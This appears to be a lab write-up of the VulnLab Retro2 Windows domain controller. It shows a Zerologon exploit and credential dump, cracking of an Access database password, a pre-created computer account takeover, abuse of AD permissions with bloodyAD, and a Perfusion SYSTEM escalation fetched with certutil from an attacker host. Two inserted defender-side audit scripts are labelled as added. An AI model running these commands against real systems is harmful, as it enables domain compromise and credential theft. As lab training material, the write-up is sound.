vulnlab-retro2

Retro2 is an easy old-school Windows 2008 DC. The chain involves decrypting a password-protected MS Access database, a pre-created computer account, GenericWrite, AddMember (AddSelf) and a local privilege escalation with Perfusion.exe.

nmap scan

# Nmap 7.93 scan initiated Wed Aug 28 09:41:18 2024 as: nmap -Pn -sC -sV -oN retro2.nmap 10.10.122.16
Nmap scan report for 10.10.122.16
Host is up (0.019s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-28 07:41:28Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required
|_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: -1s
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2024-08-28T09:42:17+02:00
| smb2-time: 
|   date: 2024-08-28T07:42:18
|_  start_date: 2024-08-28T07:40:52
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 28 09:42:57 2024 -- 1 IP address (1 host up) scanned in 99.04 seconds

unintended route: Zerologon (CVE-2020-1472)

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ python3 cve-2020-1472-exploit.py bln01 10.10.122.16 
Performing authentication attempts...
===============================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

secretsdump with the emptied machine account password

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ impacket-secretsdump -just-dc -no-pass bln01\$@10.10.122.16     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c0<redacted>48:::

enumerate SMB shares

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb 10.10.122.16         
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb 10.10.122.16 -u 'puck' -p '' --shares 
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [+] retro2.vl\puck: 
SMB         10.10.122.16    445    BLN01            [*] Enumerated shares
SMB         10.10.122.16    445    BLN01            Share           Permissions     Remark
SMB         10.10.122.16    445    BLN01            -----           -----------     ------
SMB         10.10.122.16    445    BLN01            ADMIN$                          Remote Admin
SMB         10.10.122.16    445    BLN01            C$                              Default share
SMB         10.10.122.16    445    BLN01            IPC$                            Remote IPC
SMB         10.10.122.16    445    BLN01            NETLOGON                        Logon server share 
SMB         10.10.122.16    445    BLN01            Public          READ            
SMB         10.10.122.16    445    BLN01            SYSVOL                          Logon server share 

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ impacket-smbclient guest@retro2.vl -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use Public
# ls
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 .
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 ..
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 DB
drw-rw-rw-          0  Sat Aug 17 13:58:07 2024 Temp
# cd DB
# ls
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 .
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 ..
-rw-rw-rw-     876544  Sat Aug 17 16:30:34 2024 staff.accdb
# get staff.accdb

If we open it with Microsoft Access, it prompts for a password. We use office2john to extract the hash and then crack it with john.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ office2john staff.accdb | tee officehash
staff.accdb:$office$*2013*100000*256*16*5736<redacted>8235

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ john officehash.txt --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 0.00% (ETA: 06:07:07) 0g/s 223.4p/s 223.4c/s 223.4C/s bambam..james1
cl<redacted>08          (staff.accdb)     

In the Access database (a VBA module) we find:

strsUser = "retro2\ldapreader"
strsPassword = "pp<redacted>5R"

BloodHound analysis

bloodhound-python -d retro2.vl -c all -u ldapreader -p pp<redacted>5R -ns 10.10.122.16 --dns-tcp --zip

We find the following path:

The computer account FS01 is a member of the Domain Computers group.
The Domain Computers group has GenericWrite over ADMWS01.
ADMWS01 has the AddSelf permission over the Services group.
Members of the Services group can RDP to the DC BLN01.

We guess that FS01 is a pre-created computer account whose password is the computer name in lowercase (fs01). We cannot authenticate with it directly, because the password has never been changed since the account was pre-created, so we first change it with rpcchangepwd.py.

wget https://raw.githubusercontent.com/api0cradle/impacket/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6/examples/rpcchangepwd.py

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ python3 rpcchangepwd.py retro2.vl/fs01\$:fs01@10.10.122.16 -newpass P@ssw0rd 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Password was changed successfully.
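
As an added defender-side example (not part of the original write-up), the following audit flags computer objects that look like pre-created accounts such as FS01$. The records are constructed sample data shaped like LDAP attributes; the indicators used (WORKSTATION_TRUST_ACCOUNT plus PASSWD_NOTREQD and a logonCount of 0) are the heuristic this example assumes, not a definitive rule.

```python
# Added example, not from the original write-up: audit computer objects for
# indicators of a pre-created ("pre-Windows 2000") computer account, the
# condition that allowed FS01$ to be taken over with its default password.
WORKSTATION_TRUST_ACCOUNT = 0x1000   # userAccountControl bit: domain member computer
PASSWD_NOTREQD = 0x0020              # set when the pre-Windows 2000 option is used
SERVER_TRUST_ACCOUNT = 0x2000        # domain controllers carry this instead


def looks_pre_created(obj):
    """Return True if a computer object shows pre-created account indicators.

    Heuristic assumed by this example: a workstation trust account that has
    PASSWD_NOTREQD set and has never logged on (logonCount 0), which matches an
    account whose password is still the default lowercase computer name.
    """
    uac = int(obj.get("userAccountControl", 0))
    if not uac & WORKSTATION_TRUST_ACCOUNT or uac & SERVER_TRUST_ACCOUNT:
        return False
    never_used = int(obj.get("logonCount", 0)) == 0
    return bool(uac & PASSWD_NOTREQD) and never_used


def audit_computers(objects):
    """Return sAMAccountNames of all objects flagged by looks_pre_created."""
    return [o["sAMAccountName"] for o in objects if looks_pre_created(o)]


# Constructed sample data; in a real audit these come from an LDAP query of
# objectClass=computer with the three attributes below.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "BLN01$", "userAccountControl": 532480, "logonCount": 412},
    {"sAMAccountName": "FS01$", "userAccountControl": 4128, "logonCount": 0},
    {"sAMAccountName": "ADMWS01$", "userAccountControl": 4096, "logonCount": 17},
]

if __name__ == "__main__":
    for name in audit_computers(SAMPLE_COMPUTERS):
        print(f"[!] possible pre-created computer account: {name}")
```

Flagged accounts should have their password reset (or the object removed) before someone else guesses it.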

abuse the GenericWrite permission

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb retro2.vl -u 'fs01$' -p 'P@ssw0rd'
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [+] retro2.vl\fs01$:P@ssw0rd 

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$  net rpc password 'ADMWS01$' Passw0rd1 -U retro2.vl/'fs01$'%P@ssw0rd -S bln01.retro2.vl 

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb retro2.vl -u 'ADMWS01$' -p 'P@ssw0rd'                                  
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [-] retro2.vl\ADMWS01$:P@ssw0rd STATUS_LOGON_FAILURE 

With bloodyAD, authenticating as ADMWS01$, we add 'ldapreader' to the Services group:

┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py --host 10.10.122.16 -d retro2.vl -u 'ADMWS01$' -p 'Passw0rd1' add groupMember 'SERVICES' 'ldapreader'
[+] ldapreader added to SERVICES

Now we can RDP into the box as ldapreader:

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$  xfreerdp /u:'ldapreader' /p:'pp<redacted>5R' /v:10.10.122.16 /d:retro2.vl /tls-seclevel:0 

Privesc

Any local user can create a Performance subkey and then leverage the Windows Performance Counters to load an arbitrary DLL in the context of the WMI service as NT AUTHORITY\SYSTEM (hence the tool's name).

c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/Perfusion.exe Perfusion.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp> .\Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_2844_2224_2.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[!] Failed to delete Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\temp>whoami
nt authority\system

c:\temp>type c:\users\administrator\desktop\root.txt
VL{fc<redacted>46}
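
As an added defender-side example (not from the write-up or the Perfusion project), this check looks for the condition Perfusion abuses: a Performance subkey whose Library value points at a DLL outside the Windows system directory. The input is constructed text in the format of `reg export`; the service name SomeSvc and the file paths are assumptions of this example.

```python
import re

# Added example, not from the write-up or the Perfusion project: audit the
# "Library" values under HKLM\SYSTEM\CurrentControlSet\Services\<svc>\Performance.
# That value names the DLL the WMI service loads as SYSTEM when performance
# data is collected, so a Library outside the Windows system directory (for
# example a user's Temp folder, as in the output above) is suspicious.

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
PERF_KEY = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\([^\\\]]+)\\Performance\]$",
    re.IGNORECASE)
LIBRARY = re.compile(r'^"Library"="(.*)"$', re.IGNORECASE)

def find_suspicious_perf_libraries(reg_export_text):
    """Return (service, library_path) pairs whose Performance DLL sits outside SYSTEM_DIRS."""
    findings, service = [], None
    for line in reg_export_text.splitlines():
        line = line.strip()
        if line.startswith("["):            # new key: track it only if it is a Performance subkey
            m = PERF_KEY.match(line)
            service = m.group(1) if m else None
            continue
        m = LIBRARY.match(line) if service else None
        if not m:
            continue
        path = m.group(1).replace("\\\\", "\\")      # reg export doubles backslashes in strings
        low = path.lower().replace("%systemroot%", r"c:\windows")
        # a bare file name (e.g. perfdisk.dll) is normally resolved from System32; left alone here
        if "\\" in low and not low.startswith(SYSTEM_DIRS):
            findings.append((service, path))
    return findings

# constructed sample: two legitimate providers and one pointing into a user's Temp directory
SAMPLE_EXPORT = r"""
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PerfDisk\Performance]
"Library"="perfdisk.dll"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PerfProc\Performance]
"Library"="%SystemRoot%\\System32\\perfproc.dll"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SomeSvc\Performance]
"Library"="C:\\Users\\LDAPRE~1\\AppData\\Local\\Temp\\2\\performance_2844_2224_2.dll"
"""

if __name__ == "__main__":
    for svc, lib in find_suspicious_perf_libraries(SAMPLE_EXPORT):
        print(f"[!] {svc}: Performance Library outside system dir -> {lib}")
```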

That was old-school fun.
